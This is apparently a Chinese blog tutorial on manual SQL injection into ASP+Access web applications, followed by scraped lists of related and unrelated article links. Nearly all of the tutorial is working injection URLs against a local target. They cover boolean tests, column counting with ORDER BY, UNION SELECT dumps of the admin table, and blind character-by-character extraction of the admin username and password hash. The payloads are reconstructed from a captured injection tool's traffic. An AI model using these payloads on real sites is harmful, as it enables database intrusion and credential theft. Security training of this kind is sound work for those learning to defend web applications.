asp+access注入

数据库 (access数据库没有数据库名)

表名

	字段(列名)

	记录(行,内容)

注入常用函数:

top n 表示查询结果的第n个记录

len() 函数返回文本字段中值的长度

mid(column_name,start[,length])函数用于从文本字段中提取指定长度的字符

asc() 返回指定文本字符的ASCII码

ORDER BY 语句用于根据指定的列对结果集进行排序。默认按照升序对记录进行排序,降序使用 DESC 关键字。order by admin DESC

一、asp+access 手工注入联合查询法

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 22

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 23

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

admin  a48e190fafc257d3   //and 1=2 UNION ALL SELECT 1,2,3,..... form admin 这种方法也用于先报错再获取可显示位

http

二、asp+access 手工逐字猜解法

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(admin) from admin)=5 //admin

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 (d)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 (m)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 (i)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 (n)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16  //a48e190fafc257d3

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,2,1)) from admin)=52 (4)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,3,1)) from admin)=56 (8)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,4,1)) from admin)=101 (e)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,5,1)) from admin)=49 (1)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,6,1)) from admin)=57 (9)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,7,1)) from admin)=48 (0)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,8,1)) from admin)=102 (f)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,9,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,10,1)) from admin)=102 (f)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,11,1)) from admin)=99 (c)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,12,1)) from admin)=50 (2)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,13,1)) from admin)=53 (5)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,14,1)) from admin)=55 (7)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,15,1)) from admin)=100 (d)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,16,1)) from admin)=51 (3)

三、明小子注入工具抓包分析 asp+access逐字猜解法 抓包工具:SRSniffer,WSockExpert

1.检测是否是注入点:

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from sysobjects)

2.猜是否存在指定表名:

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from user)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from menbers)

3.猜指定表是否存在指定列名(也叫字段):

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select username from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select admin from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)

3.猜admin表第一个字段有几行记录(2行记录表示两个用户):

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)<=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=2

4.猜第一行记录长度://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=4

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=6

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)=5

5.猜解第一个用户admin字段一位字符,对比ASCII值:

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select top 1 admin from admin where instr(admin,'admin')=1 and len(username)=5)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 100 and 100

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 109 and 109

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 105 and 105

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 110 and 110

6.猜解password字段长度、每一位字符:

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([password])) From (Select Top 1 * From [admin] Where 1=1 Order by [password]) T Order by [password] desc)=16

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 52 and 52

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 56 and 56

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),4,1)) from (Select Top 2 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 101 and 101

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 49 and 49

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),6,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 57 and 57

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),7,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 48 and 48

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),8,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),9,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),10,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),11,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 99 and 99

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),12,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 50 and 50

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),13,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 53 and 53

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),14,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 55 and 55

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),15,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 100 and 100

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),16,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 51 and 51

  

附:

WEB安全 asp+access注入的更多相关文章

  1. 复习ACCESS注入

    0x00前言:在学校看完了ACCESS注入.但当时并没有电脑,所以做好了笔记 回到家自己搭建了一个有ACCESS注入的站进行练习,虽然这可能没有什么用处 毕竟现在大多的网站都有waf或安全狗.而且AC ...

  2. Web安全 之 SQL注入

    随着B/S模式应用开发的发展,使用这种模式编写的应用程序也越来越多.相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码,根据 ...

  3. ASP/SQL 注入天书

    引言 随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据 ...

  4. 64位Win7下运行ASP+Access网站的方法

    64位Win7下运行ASP+Access网站的方法 近日系统升级为WIN7 64位之后,突然发现原本运行正常的ASP+ACCESS网站无法正常连接数据库. 网上搜索多次,终于解决了问题,总结了几条经验 ...

  5. WEB 安全之 SQL注入 < 三 > 提权

    SQL注入是一个比较“古老”的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆.进攻与防守相当于矛和盾的关系,我们如果能清楚了解 攻击的全 ...

  6. WEB 安全之 SQL注入 < 二 > 暴库

    SQL注入是一个比较"古老"的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆.进攻与防守相当于矛和盾的关系,我们如果 ...

  7. 使用Windows Server 2003搭建一个asp+access网站

    鼠标右键->新建->网站->下一步->描述(随便给一个,这里我以test为例) ->下一步->下一步->输入主目录的路径,默认路径下是C:\Inetpub\w ...

  8. access注入

    前面有自己总结详细的mysql注入,自己access注入碰到的比较少,虽然比较简单,但是这里做一个总结 union联合查询法: 因为union前后字段数相同,所以可以先用order by 22 使查询 ...

  9. access注入篇+sqlmap

    access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了.先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构. 下面,开始说下 ...

随机推荐

  1. Azure .NET Libraries 入门

    本指南演示了以下 Azure .NET API 的用法,包括设置认证.创建并使用 Azure 存储.创建并使用 Azure SQL 数据库.部署虚拟机.从 GitHub 部署 Azure Web 应用 ...

  2. php 函数的嵌套

    /*一定要小心变量作用域*/ function insert_dynamic() { function bar() { echo "I don't exist until insert_dy ...

  3. 常见IT英语单词

    lable标签,master精通.主人,reference参考,release发布,schema模式,component组件,persistence持久化,generate生成产生,plugin插件, ...

  4. 搭建 Visual Studio 2012 + DXperience-13.2.6 + MySql 开发平台

    一. 开发环境 1. 此开发平台主要用来开发基于.NET 4.0及以上版本的应用 2. 点击此下载 Visual Studio 2012 Ultimate 中文版开发工具 3. 点击此下载 DXper ...

  5. 单点登录-SSO

    单点登录 (Single Sign-On ) 1.同域单点登录 登录的时候,设置cookie的域即可. 2.跨域单点登录 重点是,如何在浏览器端保存登录的标识. 祭图:(脑补) 三个系统: a.aaa ...

  6. springboot开篇 (一)简单邮件发送

    上篇终结篇为spring 发送邮件,这次将使用springboot 发送邮件,同时本篇将作为springboot入门篇. 新建一个工程..工程目录结构如下,此次使用idea进行开发.对于一个长期使用e ...

  7. js判断pc端和移动端的方法

    function IsPC() { var userAgentInfo = navigator.userAgent; var Agents = ["Android", " ...

  8. jquery实现除指定区域外点击任何地方隐藏DIV

    <!--弹出的表情选择框--> <div class="layui-input-block expression-box"> </div> &l ...

  9. Java设计模式—桥梁模式

    终于又碰到了一个简单点的模式了. 桥梁模式也叫做桥接模式,定义如下:                将抽象和实现解耦,使得两者可以独立地变化. 这句话也太难理解了,桥梁模式是为了解决类继承的缺点而设计 ...

  10. 怎样修复grub开机引导(grub rescue)

    很多时候,特别是在linux调整分区后,开机重启时会出现         error : unknow filesystem         grub rescue>         的字样,系 ...